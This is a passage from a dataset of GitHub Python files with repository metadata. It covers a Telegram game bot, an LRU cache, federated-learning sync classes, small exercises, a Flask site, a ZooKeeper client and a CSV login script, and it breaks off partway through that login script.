команд:\\n'\n for i in cur_session.teams:\n text_endgame += (' ' + str(i.name) + ' ' + str(i.points) + '\\n')\n \n reply_markup = telebot.types.InlineKeyboardMarkup(keyboard)\n bot.edit_message_text(chat_id=call.message.chat.id, message_id=call.message.message_id,\n text=text_endgame, parse_mode=\"HTML\", reply_markup=reply_markup)\n\n\ndef authors(call):\n \"\"\"\n Функция изменяет сообщение в конце игры, показывая информацию об авторах\n\n :param call: отвечает за восприятие данных, передаваемых с нажатием кнопки\n\n Функция ничего не возвращает\n \"\"\"\n keyboard = [\n [telebot.types.InlineKeyboardButton(\"Панаятна\", callback_data='after_authors' +'$' +call.data[-4:])],\n ]\n reply_markup = telebot.types.InlineKeyboardMarkup(keyboard)\n createGameMessage = 'Авторы рукожопы и ленятий ничего делать не умеют, на звания пРоГрАмМиСтОв не претендуют'\n bot.edit_message_text(chat_id=call.message.chat.id, message_id=call.message.message_id, text=createGameMessage,\n reply_markup=reply_markup)\n\ndef error_teams(call):\n \"\"\"\n Функция изменяет сообщение, показывая, что нельзя начать игру, если не была добавлена ни одна команда\n\n :param call: отвечает за восприятие данных, передаваемых с нажатием кнопки\n\n Функция ничего не возвращает\n \"\"\"\n keyboard = [\n [telebot.types.InlineKeyboardButton(\"Ладно(\", callback_data='Create_Game' +'$' +call.data[-4:])],\n ]\n reply_markup = telebot.types.InlineKeyboardMarkup(keyboard)\n createGameMessage = 'Вам необходимо добавить хотя бы одну команду👉👈'\n bot.edit_message_text(chat_id=call.message.chat.id, message_id=call.message.message_id, text=createGameMessage,\n reply_markup=reply_markup)\n \ndef thanks(call):\n \"\"\"\n Функция отправляет сообщение с благодарностью за игру\n\n :param call: отвечает за восприятие данных, передаваемых с нажатием кнопки\n\n Функция ничего не возвращает\n \"\"\"\n cur_session = sessions[call.data[-4:]]\n cur_session.clear()\n text = \"Спасибо за игру!\"\n keyboard = [[]]\n reply_markup = telebot.types.InlineKeyboardMarkup(keyboard)\n bot.edit_message_text(chat_id=call.message.chat.id, message_id=call.message.message_id,\n text=text, parse_mode=\"HTML\", reply_markup=reply_markup)\n\n\nbot.infinity_polling()\n","repo_name":"m-fedosov/alias_bot","sub_path":"new.py","file_name":"new.py","file_ext":"py","file_size_in_byte":18747,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6207219317","text":"# LeetCode 146\n# LRU Cache\n# Linked List\n\nfrom typing import List\nimport collections\nimport sys\n\nclass Node:\n def __init__(self, k, v):\n self.key = k\n self.val = v\n self.next = None\n self.last = None\n\nclass LRUCache:\n\n def __init__(self, capacity: int):\n self.head = Node(0, 0)\n self.tail = Node(0, 0)\n self.head.next = self.tail\n self.tail.next = self.head\n self.cap = capacity\n self.usage = 0\n self.map = dict()\n\n def get(self, key: int) -> int:\n if key not in self.map:\n return -1\n node = self.map[key]\n if self.head.next != node:\n self.delink(node)\n self.insert(node)\n return node.val\n\n def put(self, key: int, value: int) -> None:\n if key in self.map:\n node = self.map[key]\n node.val = value\n self.delink(node)\n self.insert(node)\n return\n \n if self.usage == self.cap:\n del self.map[self.tail.last.key]\n self.delink(self.tail.last)\n self.usage = self.usage - 1\n \n node = Node(key, value)\n self.insert(node)\n self.map[key] = node\n self.usage = self.usage + 1\n\n def delink(self, node):\n node.last.next = node.next\n node.next.last = node.last\n\n def insert(self, node):\n next_node = self.head.next\n self.head.next = node\n node.last = self.head\n node.next = next_node\n next_node.last = node\n \n\nif __name__ == \"__main__\":\n # Your LRUCache object will be instantiated and called as such:\n obj = LRUCache(2)\n obj.put(1, 1)\n obj.put(2, 2)\n print(obj.get(1))\n obj.put(3, 3)\n print(obj.get(2))\n obj.put(4, 4)\n print(obj.get(1))\n print(obj.get(3))\n print(obj.get(4))","repo_name":"David-Xiang/Online-Judge-Solutions","sub_path":"210729/LC146.py","file_name":"LC146.py","file_ext":"py","file_size_in_byte":1851,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"26900681845","text":"import numpy as np\n\nfrom federatedml.util import consts\n\n\nclass SqnSyncBase(object):\n def __init__(self):\n self.batch_data_index_transfer = None\n self.host_forwards_transfer = None\n self.forward_hess = None\n self.forward_hess_transfer = None\n\n\nclass Guest(SqnSyncBase):\n def __init__(self):\n super().__init__()\n self.guest_hess_vector = None\n\n def register_transfer_variable(self, transfer_variable):\n self.batch_data_index_transfer = transfer_variable.sqn_sample_index\n self.guest_hess_vector = transfer_variable.guest_hess_vector\n self.host_forwards_transfer = transfer_variable.host_sqn_forwards\n self.forward_hess_transfer = transfer_variable.forward_hess\n\n def sync_sample_data(self, data_instances, sample_size, random_seed, suffix=tuple()):\n n = data_instances.count()\n if sample_size >= n:\n sample_rate = 1.0\n else:\n sample_rate = sample_size / n\n sampled_data = data_instances.sample(fraction=sample_rate, seed=random_seed)\n\n batch_index = sampled_data.mapValues(lambda x: None)\n self.batch_data_index_transfer.remote(obj=batch_index,\n role=consts.HOST,\n suffix=suffix)\n return sampled_data\n\n def get_host_forwards(self, suffix=tuple()):\n host_forwards = self.host_forwards_transfer.get(idx=-1,\n suffix=suffix)\n return host_forwards\n\n def remote_forward_hess(self, forward_hess, suffix=tuple()):\n self.forward_hess_transfer.remote(obj=forward_hess,\n role=consts.HOST,\n suffix=suffix)\n\n def sync_hess_vector(self, hess_vector, suffix):\n self.guest_hess_vector.remote(obj=hess_vector,\n role=consts.ARBITER,\n suffix=suffix)\n\n\nclass Host(SqnSyncBase):\n def __init__(self):\n super().__init__()\n self.host_hess_vector = None\n\n def register_transfer_variable(self, transfer_variable):\n self.batch_data_index_transfer = transfer_variable.sqn_sample_index\n self.host_forwards_transfer = transfer_variable.host_sqn_forwards\n self.host_hess_vector = transfer_variable.host_hess_vector\n self.forward_hess_transfer = transfer_variable.forward_hess\n\n def sync_sample_data(self, data_instances, suffix=tuple()):\n batch_index = self.batch_data_index_transfer.get(idx=0,\n suffix=suffix)\n sample_data = data_instances.join(batch_index, lambda x, y: x)\n return sample_data\n\n def remote_host_forwards(self, host_forwards, suffix=tuple()):\n self.host_forwards_transfer.remote(obj=host_forwards,\n role=consts.GUEST,\n suffix=suffix)\n\n def get_forward_hess(self, suffix=tuple()):\n forward_hess = self.forward_hess_transfer.get(idx=0,\n suffix=suffix)\n return forward_hess\n\n def sync_hess_vector(self, hess_vector, suffix):\n self.host_hess_vector.remote(obj=hess_vector,\n role=consts.ARBITER,\n suffix=suffix)\n\n\nclass Arbiter(object):\n def __init__(self):\n super().__init__()\n self.guest_hess_vector = None\n self.host_hess_vector = None\n\n def register_transfer_variable(self, transfer_variable):\n self.guest_hess_vector = transfer_variable.guest_hess_vector\n self.host_hess_vector = transfer_variable.host_hess_vector\n\n def sync_hess_vector(self, suffix):\n guest_hess_vector = self.guest_hess_vector.get(idx=0,\n suffix=suffix)\n host_hess_vectors = self.host_hess_vector.get(idx=-1,\n suffix=suffix)\n host_hess_vectors = [x.reshape(-1) for x in host_hess_vectors]\n hess_vectors = np.hstack((h for h in host_hess_vectors))\n hess_vectors = np.hstack((hess_vectors, guest_hess_vector))\n return hess_vectors\n","repo_name":"FederatedAI/FATE","sub_path":"python/federatedml/optim/gradient/sqn_sync.py","file_name":"sqn_sync.py","file_ext":"py","file_size_in_byte":4342,"program_lang":"python","lang":"en","doc_type":"code","stars":5296,"dataset":"github-code","pt":"53"} +{"seq_id":"21316564647","text":"# 使用turtle乌龟绘制奥运五环\r\nimport turtle\r\ndef draw_circle(x,y,color,r=45):\r\n turtle.pencolor(color)\r\n turtle.up()\r\n turtle.goto(x,y)\r\n turtle.down()\r\n turtle.circle(r)\r\n\r\nif __name__ == '__main__':\r\n colors = ['blue','black','red','yellow','green']\r\n xy_list = [(-110, -25), (0, -25), (110, -25), (-55, -75), (55, -75)]\r\n scwide = 400\r\n scheight = 400\r\n turtle.pensize(5)\r\n turtle.speed(6)\r\n turtle.screensize(scwide, scheight)\r\n for n in range(5):\r\n draw_circle(xy_list[n][0],xy_list[n][1],colors[n])\r\n turtle.hideturtle()\r\n turtle.done()\r\n","repo_name":"Ww0225/pythonTest","sub_path":"奥运五环.py","file_name":"奥运五环.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70010215847","text":"import torch \nimport torch.nn as nn\nfrom collections import OrderedDict\nfrom torch.optim import Adam\nimport numpy as np\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\n\nclass FullyConnectedLayer(nn.Module):\n def __init__(self, input_dim, output_dim, dropout = 0, task = 'None'):\n \"\"\"\n Parameters:\n input_dim (int) -- Input dimension\n output_dim (int) -- Output dimension\n dropout (float) -- Dropout rate (default : 0)\n task (str) -- Classification or regression (default : regerssion)\n \"\"\"\n super(FullyConnectedLayer, self).__init__()\n \n # Linear\n self.fc_block = [nn.Linear(input_dim, output_dim)]\n\n # Dropout\n if 0 < dropout <= 1:\n self.fc_block.append(nn.Dropout(p = dropout))\n \n # Activation function\n if task == 'cls':\n self.fc_block.append(nn.Sigmoid())\n else:\n self.fc_block.append(nn.ReLU())\n \n \n self.fc_block = nn.Sequential(*self.fc_block)\n\n def forward(self, x):\n y = self.fc_block(x)\n return y\n\n \n# Feature extractor\nclass Encoder(nn.Module):\n def __init__(self, input_dim, h_dim = [1024, 512], z_dim = 256, dropout = 0):\n \"\"\"\n Parameters:\n input_dim (int) -- Input dimension\n h_dim (list) -- hidden dimension (default : [1024, 512])\n z_dim (int) -- Output dimension (default : 256)\n dropout (float) -- Dropout rate (default : 0)\n \"\"\"\n super(Encoder, self).__init__()\n \n if len(h_dim) == 0:\n self.encoder = FullyConnectedLayer(input_dim, z_dim, dropout) # Only output layer\n else: \n self.en_layers = OrderedDict()\n self.en_layers['InputLayer'] = FullyConnectedLayer(input_dim, h_dim[0], dropout)\n for num in range(1, len(h_dim)):\n self.en_layers['Layer{}'.format(num)] = FullyConnectedLayer(h_dim[num - 1], h_dim[num], dropout)\n self.en_layers['OutputLayer'] = FullyConnectedLayer(h_dim[-1], z_dim, dropout)\n self.encoder = nn.Sequential(self.en_layers)\n \n def forward(self, x):\n encode = self.encoder(x)\n return encode\n\ndef cross_entropy(preds, targets, reduction = 'none'):\n \"\"\"\n Parameters:\n preds (int) -- Prediction result\n targets (list) -- Ground truth\n reduction (int) -- Loss recording method (default : none)\n \"\"\"\n log_softmax = nn.LogSoftmax(dim = -1)\n loss = (-targets * log_softmax(preds)).sum(1)\n if reduction == \"none\":\n return loss\n elif reduction == \"mean\":\n return loss.mean() \n\ndef cal_LA_loss(embedding1, embedding2, temperature):\n \"\"\"\n Parameters:\n embedding1 (list) -- An omics feature\n embedding2 (list) -- Another omcis feature \n temperature (float) -- To adjust the range of similarity between two matrices\n \"\"\"\n logits = (embedding1 @ embedding2.T) / temperature # Calculate the similarity of two matrices and use temperature to adjust the range \n similarity1 = embedding1 @ embedding1.T # An omics similarity matrix\n similarity2 = embedding2 @ embedding2.T # Another omics similarity matrix\n targets = F.softmax((similarity1 + similarity2) / 2 * temperature, dim = -1) # Obtain the target matrix by computing two matrices\n loss1 = cross_entropy(logits, targets, reduction = 'none')\n loss2 = cross_entropy(logits.T, targets.T, reduction = 'none')\n return ((loss1 + loss2) / 2.0).mean()\n\ndef C(k):\n \"\"\"\n Parameters:\n k (int) -- Input to calculate the number of combinations\n \"\"\"\n return int(k * (k - 1) / 2)\n\n# Latent Alginment Multi-Omics Integration\nclass LAMOI(nn.Module):\n def __init__(self, input_dim, h_dim, z_dim, temperature, dropout, device, attention = True, Weight = 1.0, k = 40, channel = 2):\n \"\"\"\n Parameters:\n input_dim (int) -- Number of features per omics data\n h_dim (list) -- Hidden dimension\n z_dim (list) -- Output dimension of feature extractor\n temperature (float) -- To adjust the range of similarity between two matrices\n dropout (float) -- Dropout rate \n device (float) -- CPU or GPU\n attention (bool) -- Using attention module or not\n Weight (float) -- Weight of latent alignment loss\n k (float) -- Hidden dimension of omcis weights\n channel (int) -- Hidden dimension of affinity weights\n \"\"\"\n super(LAMOI, self).__init__()\n \n self.encoder = nn.ModuleList([Encoder(input_dim[i], h_dim[i], z_dim, dropout) for i in range(len(input_dim))]) # Initial feature extractors of these omics data\n \n self.aff_weight = nn.ParameterList([nn.Parameter(torch.randn(int(z_dim / channel), int(z_dim / channel))) for i in range(C(len(input_dim)))]) # The affinity matrix under the pairwise information in these omics data \n self.W = nn.ParameterList([nn.Parameter(torch.randn(k, int(z_dim / channel))) for i in range(len(input_dim))]) # The weight of these omics data\n self.W_h = nn.ParameterList([nn.ParameterList([nn.Parameter(torch.randn(k, 1)) for i in range(len(input_dim))]) for i in range(len(input_dim))]) # The weight under the pairwise these omics data \n \n self.Weight = Weight # lambda : weight of latent alignment loss\n self.device = device\n self.temperature = temperature # Adjust hyperparameter for similarity range\n self.softmax = nn.Softmax(2)\n self.tanh = nn.Tanh()\n self.z_dim = z_dim\n self.channel = channel # Adjust hyperparameter for affinity weight\n self.att = attention # Using attention or not\n \n def forward(self, x):\n # feature extraction\n encode = [self.encoder[i](x[i]) for i in range(len(x))]\n \n concat_data = encode[0]\n for i in range(1, len(x)):\n concat_data = torch.cat((concat_data, encode[i]), 1)\n \n if self.att:\n if len(x) > 1: # The number of omics data is greater than one\n temp_encode = encode.copy()\n # Divide the features on the latent space into N blocks\n for i in range(len(temp_encode)):\n temp_encode[i] = torch.unsqueeze(temp_encode[i], 2).reshape(-1, int(self.z_dim / self.channel), self.channel)\n # Initialize\n affinity_matrix, H, A, Att_encode = [], [], [], []\n for i in range(len(temp_encode)):\n index = 0\n affinity_matrix.append([])\n H.append([])\n A.append([])\n Att_encode.append([])\n for j in range(len(temp_encode)):\n if i <= j:\n affinity_matrix[i].append(torch.swapaxes(temp_encode[i], 1, 2) @ self.aff_weight[index] @ temp_encode[j]) # Use the aff_weight to learn the information between two omcis\n H[i].append(self.tanh(self.W[j] @ temp_encode[j] + self.W[i] @ temp_encode[i] @ affinity_matrix[i][j])) # Use W to weight all omics and add up\n if i < j: index += 1\n else:\n affinity_matrix[i].append(torch.swapaxes(affinity_matrix[j][i], 1, 2))\n H[i].append(self.tanh(self.W[i] @ temp_encode[i] + self.W[j] @ temp_encode[j] @ affinity_matrix[i][j]))\n A[i].append(self.softmax(self.W_h[i][j].T @ H[i][j])) # Use softmax to get the omics weights containing all omics data information\n if i != j:\n Att_encode[i].append(A[i][j] * temp_encode[i]) # Multiply the attention weight back to each physical data\n\n concat_data = Att_encode[0][0].reshape(-1, self.z_dim)\n for i in range(len(Att_encode)):\n for j in range(len(Att_encode[i])):\n if i != 0 or j != 0:\n concat_data = torch.cat((concat_data, Att_encode[i][j].reshape(-1, self.z_dim)), 1)\n \n return encode, concat_data\n \n def loss(self, x):\n reconstruct_loss = nn.MSELoss()\n encode, concat_data = self.forward(x)\n loss_LA = 0\n \n if self.Weight > 0:\n for i in range(len(encode)):\n for j in range(i + 1, len(encode)):\n loss_LA = loss_LA + cal_LA_loss(encode[i], encode[j], self.temperature) # Calculate the latent alignment loss between all omics\n \n loss_LA = self.Weight * loss_LA\n \n return loss_LA\n\n# Predictor\nclass Regression(nn.Module):\n def __init__(self, n_class, latent_dim, class_dim):\n \"\"\"\n Construct a multi-layer fully-connected classifier\n Parameters:\n n_class (int) -- Ouput dimension (number of drugs)\n latent_dim (int) -- The dimensionality of the latent space and the input layer of the classifier\n class_dim (int) -- Hidden dimension\n \"\"\"\n super(Regression, self).__init__()\n \n self.reg = nn.Sequential(\n nn.Linear(latent_dim, class_dim[0]),\n nn.ReLU(),\n nn.Linear(class_dim[0], class_dim[1]),\n nn.ReLU(),\n nn.Linear(class_dim[1], n_class),\n )\n \n def forward(self, x):\n return self.reg(x)\n","repo_name":"Chei-YuanChi/Matster_Thesis","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":9723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20387048703","text":"'''\nCrie um programa que leia o nome de uma pessoa e diga se ela tem \"SILVA\" no nome.\n\n'''\n\nnome = input('Digite seu nome: ').upper()\n\nmensagem = [\n f\"Seu nome '{nome}' não tem 'SILVA'.\", \n f\"Seu nome '{nome}' tem 'SILVA'.\"\n]\n\nprint(mensagem['SILVA' in nome])","repo_name":"juliannalencar/exercicios-fixacao","sub_path":"curso_em_video_py/ex025.py","file_name":"ex025.py","file_ext":"py","file_size_in_byte":266,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41689973671","text":"#This program predicts what type of flower based on an input and graphs the points.\n\nimport numpy as np\nfrom sklearn.datasets import load_iris\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.neighbors import KNeighborsClassifier\nimport matplotlib.pyplot as plt\n\niris = load_iris()\n#print(iris.keys())\n#print(iris['data'])\n#print(iris['DESCR'])\n#print(iris['target_names'])\n\nX_train, X_test, y_train, y_test = train_test_split(iris['data'], iris['target'], random_state=0)\n\nknn = KNeighborsClassifier(n_neighbors=1)\nknn.fit(X_train, y_train)\n\nX_new = np.array([[1,2,1,2]])\n\nprediction = knn.predict(X_new)\n\nprint(iris['target_names'][prediction])\n\nprint(knn.score(X_test, y_test))\n\nplt.scatter(iris.data[:, 0], iris.data[:, 1], c=iris.target)\nplt.xlabel('sepal_length')\nplt.ylabel('sepal_width')\nformatter = plt.FuncFormatter(lambda i, *args: iris.target_names[int(i)])\nplt.colorbar(ticks=[0, 1, 2], format=formatter)\nplt.show()\n","repo_name":"DanielBDosSantos/Iris-data-prediction-and-graphing","sub_path":"irisGraph/iris_class_prediction.py","file_name":"iris_class_prediction.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35646183928","text":"#!/usr/bin/env python2.7\nimport time, socket, os, uuid, sys, kazoo, logging, signal, utils, random\nfrom election import Election\nfrom utils import MASTER_PATH\nfrom utils import TASKS_PATH\nfrom utils import DATA_PATH\nfrom utils import WORKERS_PATH\n\nclass Client:\n def __init__(self, zk):\n self.limit = 5\n self.zk = zk\n self.counter = 0\n\n def submit_task(self):\n task_id = uuid.uuid4()\n task_data = str(random.randint(5, 20))\n print (\"creating task\", task_id)\n self.zk.create(TASKS_PATH + \"/\" + task_id)\n self.zk.create(DATA_PATH + \"/\" + task_id, value=task_data)\n self.counter += 1\n self.zk.get(TASKS_PATH + \"/\" + task_id, watch=self.task_completed)\n\n def task_completed(self, event):\n result = self.zk.get(event.path)[0]\n self.zk.delete(event.path)\n self.zk.delete(event.path.replace(TASKS_PATH, DATA_PATH))\n self.counter -= 1\n print (\"task\", event.path.replace(TASKS_PATH + \"/\", \"\"), \"completed\")\n return result\n\n def submit_task_loop(self):\n while True:\n if self.counter <= self.limit:\n self.submit_task()\n\n\nif __name__ == '__main__':\n zoo_keeper = utils.init()\n client = Client(zoo_keeper)\n client.submit_task_loop()\n while True:\n time.sleep(1)","repo_name":"tA-bot-git/zk","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"17439994932","text":"import os\nimport json\n\n# Importing flask class\nfrom flask import Flask, render_template, request, flash\n\n# Creating instance of this and storing in a var called app\n# First argument of the Flask class is the name of the applications module\napp = Flask(__name__)\napp.secret_key = \"some_secret\"\n\n# A decorator starts with the @ sign, which is also called pie notation. \n@app.route(\"/\")\ndef index():\n return render_template(\"index.html\")\n\n\n@app.route(\"/about\")\ndef about():\n data = []\n with open(\"data/company.json\", \"r\") as json_data:\n data = json.load(json_data)\n \n return render_template(\"about.html\", page_title=\"About\", company=data)\n\n\n@app.route(\"/about/\")\ndef about_member(member_name):\n member = {}\n\n with open(\"data/company.json\", \"r\") as json_data:\n data = json.load(json_data)\n for obj in data:\n # if url in that particular element of array is equal to member_name, then member obj should equal our obj\n if obj[\"url\"] == member_name:\n member = obj\n\n return render_template(\"member.html\", member=member)\n\n\n@app.route(\"/contact\", methods=[\"GET\", \"POST\"])\ndef contact(): \n if request.method == \"POST\":\n flash(\"Thanks {}, we have received your message!\".format(\n request.form[\"name\"]))\n\n return render_template(\"contact.html\", page_title=\"Contact\")\n\n\n@app.route(\"/careers\")\ndef careers():\n return render_template(\"careers.html\", page_title=\"Careers\")\n\n# Name of the default module in Python.\nif __name__ == \"__main__\":\n app.run(host=os.environ.get('IP'),\n port=int(os.environ.get('PORT')),\n debug=True) \n'''\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', \n port=5000, \n debug=True)\n '''","repo_name":"terencecistudent/flask","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37452750230","text":"class minHeap():\r\n def __init__(self):\r\n self.size = 0 \r\n self.heap = []\r\n self.pos = dict()\r\n \r\n def parent(self, pos):\r\n if(pos==0):\r\n return -1\r\n return (pos-1)//2\r\n\r\n def left(self, pos):\r\n ans = 2*pos+1\r\n if(ans>=self.size):\r\n return -1\r\n return ans\r\n\r\n def right(self, pos):\r\n ans = 2*pos+2\r\n if(ans>=self.size):\r\n return -1\r\n return ans\r\n\r\n def swap(self, i, j):\r\n self.pos[self.heap[i][1]] = j\r\n self.pos[self.heap[j][1]] = i\r\n self.heap[i], self.heap[j] = self.heap[j], self.heap[i]\r\n\r\n #Insert while maintaining heap property.\r\n #Value will be the weight or distance.\r\n def insert(self, val, vertex):\r\n self.size+=1\r\n self.heap.append([val, vertex])\r\n curr = self.size-1\r\n self.pos[vertex] = curr\r\n \r\n #The case if its the first element that we inserted\r\n if(self.parent(curr)==-1):\r\n return\r\n\r\n while(self.parent(curr)!=-1):\r\n if(self.heap[curr][0] < self.heap[self.parent(curr)][0]):\r\n self.swap(curr, self.parent(curr))\r\n curr = self.parent(curr)\r\n else:\r\n break\r\n \r\n #It takes in a position in array and fixes the heap formed from this node as root assuming all below are in order.\r\n def minHeapify(self, pos):\r\n left = self.left(pos)\r\n right= self.right(pos)\r\n\r\n #No child\r\n if(left==-1):\r\n return\r\n #No right child\r\n elif(right==-1):\r\n if(self.heap[left][0]self.heap[pos][0]):\r\n self.swap(self.parent(pos), pos)\r\n pos=self.parent(pos)\r\n else:\r\n break\r\n","repo_name":"abhibhargav29/DataStructures","sub_path":"9.2)ModifiedHeap.py","file_name":"9.2)ModifiedHeap.py","file_ext":"py","file_size_in_byte":2966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74172686249","text":"import os\nimport json\nimport numpy as np\nfrom PIL import Image\n\n\ndef rle_decode(rle, shape):\n s = rle.split()\n starts, lengths = [np.asarray(x, dtype=int) for x in (s[0:][::2], s[1:][::2])]\n starts -= 1\n ends = starts + lengths\n img = np.zeros(shape[0]*shape[1], dtype=np.uint8)\n for lo, hi in zip(starts, ends):\n img[lo:hi] = 1\n return img.reshape(shape)\n\n\nif __name__ == \"__main__\":\n\n # Just for completeness, here we show how the rle encoded mask\n # is transformed back to a numpy array\n\n # Read the submission.json file generated by the\n # 'prepare_submission.py' script\n with open('./predictions/submission.json', 'r') as f:\n submission_dict = json.load(f)\n\n img_name = 'arr_mask_example'\n img_shape = submission_dict[img_name]['shape']\n\n rle_encoded_crop = submission_dict[img_name]['segmentation']['crop']\n rle_encoded_weed = submission_dict[img_name]['segmentation']['weed']\n\n # Reconstruct crop and weed binary masks\n crop_mask = rle_decode(rle_encoded_crop, shape=img_shape)\n weed_mask = rle_decode(rle_encoded_weed, shape=img_shape)\n\n # Reconstruct original mask\n # weed_mask * 2 allows to convert ones into target 2 (weed label)\n reconstructed_mask = crop_mask + (weed_mask * 2)\n\n # Check that the RLE decoded mask is the same of the original mask\n # before the RLE encoding\n original_mask = np.load('./predictions/arr_mask_example.npy')\n\n np.testing.assert_allclose(original_mask, reconstructed_mask)\n\n # Just for visualisation purposes, save RGB reconstructed mask\n # Use again the dictionary in 'RGBtoTarget.txt'.\n reconstructed_rgb_arr = np.zeros(shape=img_shape + [3])\n reconstructed_rgb_arr[reconstructed_mask == 1] = [255, 255, 255]\n reconstructed_rgb_arr[reconstructed_mask == 2] = [216, 67, 82]\n\n reconstructed_rgb_img = Image.fromarray(\n np.uint8(reconstructed_rgb_arr))\n reconstructed_rgb_img.save('./predictions/rle_decoded_rgb_mask.png')\n\n # Please notice that the 'unknown' class corresponding to the\n # RGB value [216, 124, 18] is not considered for the evaluation\n # and thus does not appear in the reconstructed mask.\n","repo_name":"Desno365/Deep-Learning-2020-AN2DL-project","sub_path":"homework2/starting_kit/decode_rle_example.py","file_name":"decode_rle_example.py","file_ext":"py","file_size_in_byte":2176,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"72686818728","text":"#Imports-----------------------------------------------------------------------\r\nimport pandas as pd\r\nimport xml.etree.ElementTree as ET\r\nfrom lxml import etree\r\nimport string\r\nfrom collections import defaultdict\r\nimport gensim\r\nimport numpy as np\r\n\r\n\r\n#Helper Functions--------------------------------------------------------------\r\ndef clean_word(w):\r\n strip_str = \"()\\\".?!,;\"\r\n new_word = \"\".join((c for c in w if c in string.printable))\r\n return new_word.strip(strip_str).lower()\r\n\r\ndef clean_text_list(doc):\r\n words = doc.split()\r\n clean_words = [clean_word(word) for word in words]\r\n return clean_words\r\n\r\ndef xml2df(xml_data):\r\n tree = ET.parse(xml_data)\r\n root = tree.getroot()\r\n all_records = []\r\n headers = []\r\n for i, child in enumerate(root):\r\n record = []\r\n for subchild in child:\r\n record.append(subchild.text)\r\n if subchild.tag not in headers:\r\n headers.append(subchild.tag)\r\n all_records.append(record)\r\n return pd.DataFrame(all_records, columns=headers)\r\n\r\ndef trainModel(fname):\r\n try:\r\n df = xml2df(fname)\r\n except:\r\n print(\"Data not found\")\r\n return\r\n\r\n #Training the Model------------------------------------------------------------\r\n text = df['Text'].as_matrix()\r\n sentences = [clean_text_list(doc) for doc in text if type(doc) == str]\r\n model = gensim.models.Word2Vec(sentences, size=300, window=5, min_count=5)\r\n model.save('SavedModel')\r\n return\r\n\r\n#End Script--------------------------------------------------------------------\r\n","repo_name":"zachdtaylor/MathArticleCategorizer","sub_path":"ModeltoFile.py","file_name":"ModeltoFile.py","file_ext":"py","file_size_in_byte":1595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72310064169","text":"n = int(input())\nX = [float(x) for x in input().strip().split()]\nY = [float(y) for y in input().strip().split()]\ndi = 0;\n\ncloneX = X.copy()\ncloneY = Y.copy()\ncloneX.sort()\ncloneY.sort()\n\nfor i in range(n):\n di += ((cloneX.index(X[i]) + 1) - (cloneY.index(Y[i]) + 1)) **2\n\n#calculate the result using pearman's rank correlation coefficient formula\nresult = 1 - ((6 * di) / (n * (n ** 2 -1)))\nprint(\"%.3f\"%result)\n","repo_name":"chinshanhong/HackerRank","sub_path":"10 Days of Statistics/Day 7: Spearman's Rank Correlation Coefficient.py","file_name":"Day 7: Spearman's Rank Correlation Coefficient.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31096646108","text":"#this is a console based hangman game.\r\n#I've made a list with 10 different car names.\r\n\r\n\r\nimport random\r\ncars =['bugatti','ferrari','mercedes','audi','lamborghini','rolls-royce','tata','ford','renault','jaguar','lexus','toyota']\r\ns= random.choice(cars)\r\ndash=len(s)*'_'\r\nresult=list(dash)\r\ncount=4\r\n\r\nwhile count>0:\r\n n=0\r\n print('you have '+ str(count)+ ' guess left')\r\n x=input(\"your guess: \")\r\n\r\n for i in range(len(s)):\r\n if(x==s[i]):\r\n result[i]=x\r\n print(result[i],end='')\r\n else:\r\n print(result[i],end='')\r\n n=n+1\r\n print('\\n')\r\n if n==len(s):\r\n count=count-1\r\n\r\n if(list(s)==result):\r\n print(\"Successsssss\")\r\n break\r\n\r\nif count==0:\r\n print('loseeeeee')\r\n\r\n","repo_name":"NirmalGelal/Hangman","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41977674591","text":"import csv\n\ndef nieuwe_gebruiker():\n\n list = []\n\n with open(\"login.csv\", \"r\") as myCSVFile:\n reader = csv.reader(myCSVFile, delimiter=\";\")\n for row in reader:\n for field in row:\n list.append(field)\n myCSVFile.close()\n\n while True:\n naam = raw_input(\"wat voor gebruikersnaam wilt u: \")\n\n if naam in list:\n print(\"deze naam is al in gebruik\")\n\n else:\n wachtwoord = raw_input(\"wat voor wachtwoord wilt u: \")\n with open(\"login.csv\", \"a\") as meCSVFile:\n writer = csv.writer(meCSVFile, delimiter=\";\")\n writer.writerow((naam, wachtwoord))\n break\n\ndef inloggen():\n\n list = []\n wachtwoordList = []\n naamList = []\n\n with open(\"login.csv\", \"r\") as myCSVFile:\n reader = csv.reader(myCSVFile, delimiter=\";\")\n for row in reader:\n for field in row:\n list.append(field)\n myCSVFile.close()\n\n teller = 0\n teller2 = 1\n\n while teller2 < len(list):\n wachtwoordList.append(list[teller2])\n naamList.append(list[teller])\n teller += 2\n teller2 += 2\n\n naam = raw_input(\"wat is de gebruikersnaam: \")\n wachtwoord = raw_input(\"wat is het wachtwoord: \")\n\n if wachtwoord in wachtwoordList and naam in naamList:\n teller = naamList.index(naam)\n if wachtwoord == wachtwoordList[teller]:\n print(\"Uw bent 